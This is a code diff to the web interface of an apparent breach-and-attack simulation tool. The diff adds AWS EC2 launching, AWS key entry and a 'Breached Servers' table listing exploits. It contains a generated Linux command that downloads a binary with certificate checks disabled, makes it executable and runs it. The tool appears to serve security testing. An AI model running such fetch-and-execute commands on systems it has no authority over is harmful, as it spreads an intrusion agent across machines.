@ -50,9 +69,20 @@ class RunMonkeyPageComponent extends AuthComponent {
|
||||||
this.props.onStatusChange();
|
this.props.onStatusChange();
|
||||||
}
|
}
|
||||||
|
|
||||||
|
fetchAwsInfo() {
|
||||||
|
return this.authFetch('/api/remote-monkey?action=list_aws')
|
||||||
|
.then(res => res.json())
|
||||||
|
.then(res =>{
|
||||||
|
let is_aws = res['is_aws'];
|
||||||
|
if (is_aws) {
|
||||||
|
this.setState({isOnAws: true, awsMachines: res['instances'], isAwsAuth: res['auth']});
|
||||||
|
}
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
generateLinuxCmd(ip, is32Bit) {
|
generateLinuxCmd(ip, is32Bit) {
|
||||||
let bitText = is32Bit ? '32' : '64';
|
let bitText = is32Bit ? '32' : '64';
|
||||||
return `curl -O -k https://${ip}:5000/api/monkey/download/monkey-linux-${bitText}; chmod +x monkey-linux-${bitText}; ./monkey-linux-${bitText} m0nk3y -s ${ip}:5000`
|
return `wget --no-check-certificate https://${ip}:5000/api/monkey/download/monkey-linux-${bitText}; chmod +x monkey-linux-${bitText}; ./monkey-linux-${bitText} m0nk3y -s ${ip}:5000`
|
||||||
}
|
}
|
||||||
|
|
||||||
generateWindowsCmd(ip, is32Bit) {
|
generateWindowsCmd(ip, is32Bit) {
|
||||||
|
@ -134,6 +164,192 @@ class RunMonkeyPageComponent extends AuthComponent {
|
||||||
});
|
});
|
||||||
};
|
};
|
||||||
|
|
||||||
|
toggleAws = () => {
|
||||||
|
this.setState({
|
||||||
|
showAws: !this.state.showAws
|
||||||
|
});
|
||||||
|
};
|
||||||
|
|
||||||
|
runOnAws = () => {
|
||||||
|
this.setState({
|
||||||
|
awsClicked: true
|
||||||
|
});
|
||||||
|
|
||||||
|
let instances = this.awsTable.state.selection.map(x => this.instanceIdToInstance(x));
|
||||||
|
|
||||||
|
this.authFetch('/api/remote-monkey',
|
||||||
|
{
|
||||||
|
method: 'POST',
|
||||||
|
headers: {'Content-Type': 'application/json'},
|
||||||
|
body: JSON.stringify({type: 'aws', instances: instances, island_ip: this.state.selectedIp})
|
||||||
|
}).then(res => res.json())
|
||||||
|
.then(res => {
|
||||||
|
let result = res['result'];
|
||||||
|
|
||||||
|
// update existing state, not run-over
|
||||||
|
let prevRes = this.awsTable.state.result;
|
||||||
|
for (let key in result) {
|
||||||
|
if (result.hasOwnProperty(key)) {
|
||||||
|
prevRes[key] = result[key];
|
||||||
|
}
|
||||||
|
}
|
||||||
|
this.awsTable.setState({
|
||||||
|
result: prevRes,
|
||||||
|
selection: [],
|
||||||
|
selectAll: false
|
||||||
|
});
|
||||||
|
|
||||||
|
this.setState({
|
||||||
|
awsClicked: false
|
||||||
|
});
|
||||||
|
});
|
||||||
|
};
|
||||||
|
|
||||||
|
updateAwsKeyId = (evt) => {
|
||||||
|
this.setState({
|
||||||
|
awsKeyId: evt.target.value
|
||||||
|
});
|
||||||
|
};
|
||||||
|
|
||||||
|
updateAwsSecretKey = (evt) => {
|
||||||
|
this.setState({
|
||||||
|
awsSecretKey: evt.target.value
|
||||||
|
});
|
||||||
|
};
|
||||||
|
|
||||||
|
fetchConfig() {
|
||||||
|
return this.authFetch('/api/configuration/island')
|
||||||
|
.then(res => res.json())
|
||||||
|
.then(res => {
|
||||||
|
return res.configuration;
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
updateAwsKeys = () => {
|
||||||
|
this.setState({
|
||||||
|
awsUpdateClicked: true,
|
||||||
|
awsUpdateFailed: false
|
||||||
|
});
|
||||||
|
this.fetchConfig()
|
||||||
|
.then(config => {
|
||||||
|
let new_config = config;
|
||||||
|
new_config['cnc']['aws_config']['aws_access_key_id'] = this.state.awsKeyId;
|
||||||
|
new_config['cnc']['aws_config']['aws_secret_access_key'] = this.state.awsSecretKey;
|
||||||
|
return new_config;
|
||||||
|
})
|
||||||
|
.then(new_config => {
|
||||||
|
this.authFetch('/api/configuration/island',
|
||||||
|
{
|
||||||
|
method: 'POST',
|
||||||
|
headers: {'Content-Type': 'application/json'},
|
||||||
|
body: JSON.stringify(new_config)
|
||||||
|
})
|
||||||
|
.then(res => res.json())
|
||||||
|
.then(res => {
|
||||||
|
this.fetchAwsInfo()
|
||||||
|
.then(res => {
|
||||||
|
if (!this.state.isAwsAuth) {
|
||||||
|
this.setState({
|
||||||
|
awsUpdateClicked: false,
|
||||||
|
awsUpdateFailed: true
|
||||||
|
})
|
||||||
|
}
|
||||||
|
});
|
||||||
|
});
|
||||||
|
});
|
||||||
|
};
|
||||||
|
|
||||||
|
instanceIdToInstance = (instance_id) => {
|
||||||
|
let instance = this.state.awsMachines.find(
|
||||||
|
function (inst) {
|
||||||
|
return inst['instance_id'] === instance_id;
|
||||||
|
});
|
||||||
|
return {'instance_id': instance_id, 'os': instance['os']}
|
||||||
|
|
||||||
|
};
|
||||||
|
|
||||||
|
renderAuthAwsDiv() {
|
||||||
|
return (
|
||||||
|
<div style={{'marginBottom': '2em'}}>
|
||||||
|
{
|
||||||
|
this.state.ips.length > 1 ?
|
||||||
|
<Nav bsStyle="pills" justified activeKey={this.state.selectedIp} onSelect={this.setSelectedIp}
|
||||||
|
style={{'marginBottom': '2em'}}>
|
||||||
|
{this.state.ips.map(ip => <NavItem key={ip} eventKey={ip}>{ip}</NavItem>)}
|
||||||
|
</Nav>
|
||||||
|
: <div style={{'marginBottom': '2em'}} />
|
||||||
|
}
|
||||||
|
|
||||||
|
<AwsRunTable
|
||||||
|
data={this.state.awsMachines}
|
||||||
|
ref={r => (this.awsTable = r)}
|
||||||
|
/>
|
||||||
|
<div style={{'marginTop': '1em'}}>
|
||||||
|
<button
|
||||||
|
onClick={this.runOnAws}
|
||||||
|
className={'btn btn-default btn-md center-block'}
|
||||||
|
disabled={this.state.awsClicked}>
|
||||||
|
Run on selected machines
|
||||||
|
{ this.state.awsClicked ? <Icon name="refresh" className="text-success" style={{'marginLeft': '5px'}}/> : null }
|
||||||
|
</button>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
renderNotAuthAwsDiv() {
|
||||||
|
return (
|
||||||
|
<div style={{'marginBottom': '2em'}}>
|
||||||
|
<p style={{'fontSize': '1.2em'}}>
|
||||||
|
You haven't set your AWS account details or they're incorrect. Please enter them below to proceed.
|
||||||
|
</p>
|
||||||
|
<div style={{'marginTop': '1em'}}>
|
||||||
|
<div className="col-sm-12">
|
||||||
|
<div className="col-sm-6 col-sm-offset-3" style={{'fontSize': '1.2em'}}>
|
||||||
|
<div className="panel panel-default">
|
||||||
|
<div className="panel-body">
|
||||||
|
<div className="input-group center-block text-center">
|
||||||
|
<input type="text" className="form-control" placeholder="AWS Access Key ID"
|
||||||
|
value={this.state.awsKeyId}
|
||||||
|
onChange={evt => this.updateAwsKeyId(evt)}/>
|
||||||
|
<input type="text" className="form-control" placeholder="AWS Secret Access Key"
|
||||||
|
value={this.state.awsSecretKey}
|
||||||
|
onChange={evt => this.updateAwsSecretKey(evt)}/>
|
||||||
|
<Button
|
||||||
|
onClick={this.updateAwsKeys}
|
||||||
|
className={'btn btn-default btn-md center-block'}
|
||||||
|
disabled={this.state.awsUpdateClicked}
|
||||||
|
variant="primary">
|
||||||
|
Update AWS details
|
||||||
|
{ this.state.awsUpdateClicked ? <Icon name="refresh" className="text-success" style={{'marginLeft': '5px'}}/> : null }
|
||||||
|
</Button>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div className="col-sm-8 col-sm-offset-2" style={{'fontSize': '1.2em'}}>
|
||||||
|
<p className="alert alert-info">
|
||||||
|
<i className="glyphicon glyphicon-info-sign" style={{'marginRight': '5px'}}/>
|
||||||
|
In order to remotely run commands on AWS EC2 instances, please make sure you have
|
||||||
|
the <a href="https://docs.aws.amazon.com/console/ec2/run-command/prereqs" target="_blank">prerequisites</a> and if the
|
||||||
|
instances don't show up, check the
|
||||||
|
AWS <a href="https://docs.aws.amazon.com/console/ec2/run-command/troubleshooting" target="_blank">troubleshooting guide</a>.
|
||||||
|
</p>
|
||||||
|
</div>
|
||||||
|
{
|
||||||
|
this.state.awsUpdateFailed ?
|
||||||
|
<div className="col-sm-8 col-sm-offset-2" style={{'fontSize': '1.2em'}}>
|
||||||
|
<p className="alert alert-danger" role="alert">Authentication failed.</p>
|
||||||
|
</div>
|
||||||
|
:
|
||||||
|
null
|
||||||
|
}
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
render() {
|
render() {
|
||||||
return (
|
return (
|
||||||
<Col xs={12} lg={8}>
|
<Col xs={12} lg={8}>
|
||||||
|
@ -166,7 +382,7 @@ class RunMonkeyPageComponent extends AuthComponent {
|
||||||
<p className="text-center">
|
<p className="text-center">
|
||||||
OR
|
OR
|
||||||
</p>
|
</p>
|
||||||
<p style={{'marginBottom': '2em'}}>
|
<p style={this.state.showManual || !this.state.isOnAws ? {'marginBottom': '2em'} : {}}>
|
||||||
<button onClick={this.toggleManual} className={'btn btn-default btn-lg center-block' + (this.state.showManual ? ' active' : '')}>
|
<button onClick={this.toggleManual} className={'btn btn-default btn-lg center-block' + (this.state.showManual ? ' active' : '')}>
|
||||||
Run on machine of your choice
|
Run on machine of your choice
|
||||||
</button>
|
</button>
|
||||||
|
@ -196,6 +412,30 @@ class RunMonkeyPageComponent extends AuthComponent {
|
||||||
{this.generateCmdDiv()}
|
{this.generateCmdDiv()}
|
||||||
</div>
|
</div>
|
||||||
</Collapse>
|
</Collapse>
|
||||||
|
{
|
||||||
|
this.state.isOnAws ?
|
||||||
|
<p className="text-center">
|
||||||
|
OR
|
||||||
|
</p>
|
||||||
|
:
|
||||||
|
null
|
||||||
|
}
|
||||||
|
{
|
||||||
|
this.state.isOnAws ?
|
||||||
|
<p style={{'marginBottom': '2em'}}>
|
||||||
|
<button onClick={this.toggleAws} className={'btn btn-default btn-lg center-block' + (this.state.showAws ? ' active' : '')}>
|
||||||
|
Run on AWS machine of your choice
|
||||||
|
</button>
|
||||||
|
</p>
|
||||||
|
:
|
||||||
|
null
|
||||||
|
}
|
||||||
|
<Collapse in={this.state.showAws}>
|
||||||
|
{
|
||||||
|
this.state.isAwsAuth ? this.renderAuthAwsDiv() : this.renderNotAuthAwsDiv()
|
||||||
|
}
|
||||||
|
|
||||||
|
</Collapse>
|
||||||
|
|
||||||
<p style={{'fontSize': '1.2em'}}>
|
<p style={{'fontSize': '1.2em'}}>
|
||||||
Go ahead and monitor the ongoing infection in the <Link to="/infection/map">Infection Map</Link> view.
|
Go ahead and monitor the ongoing infection in the <Link to="/infection/map">Infection Map</Link> view.
|
||||||
|
|
|
@ -5,12 +5,17 @@ let renderArray = function(val) {
|
||||||
return <div>{val.map(x => <div>{x}</div>)}</div>;
|
return <div>{val.map(x => <div>{x}</div>)}</div>;
|
||||||
};
|
};
|
||||||
|
|
||||||
|
let renderIpAddresses = function (val) {
|
||||||
|
return <div>{renderArray(val.ip_addresses)} {(val.domain_name ? " (".concat(val.domain_name, ")") : "")} </div>;
|
||||||
|
};
|
||||||
|
|
||||||
const columns = [
|
const columns = [
|
||||||
{
|
{
|
||||||
Header: 'Breached Servers',
|
Header: 'Breached Servers',
|
||||||
columns: [
|
columns: [
|
||||||
{Header: 'Machine', accessor: 'label'},
|
{Header: 'Machine', accessor: 'label'},
|
||||||
{Header: 'IP Addresses', id: 'ip_addresses', accessor: x => renderArray(x.ip_addresses)},
|
{Header: 'IP Addresses', id: 'ip_addresses',
|
||||||
|
accessor: x => renderIpAddresses(x)},
|
||||||
{Header: 'Exploits', id: 'exploits', accessor: x => renderArray(x.exploits)}
|
{Header: 'Exploits', id: 'exploits', accessor: x => renderArray(x.exploits)}
|
||||||
]
|
]
|
||||||
}
|
}
|
||||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue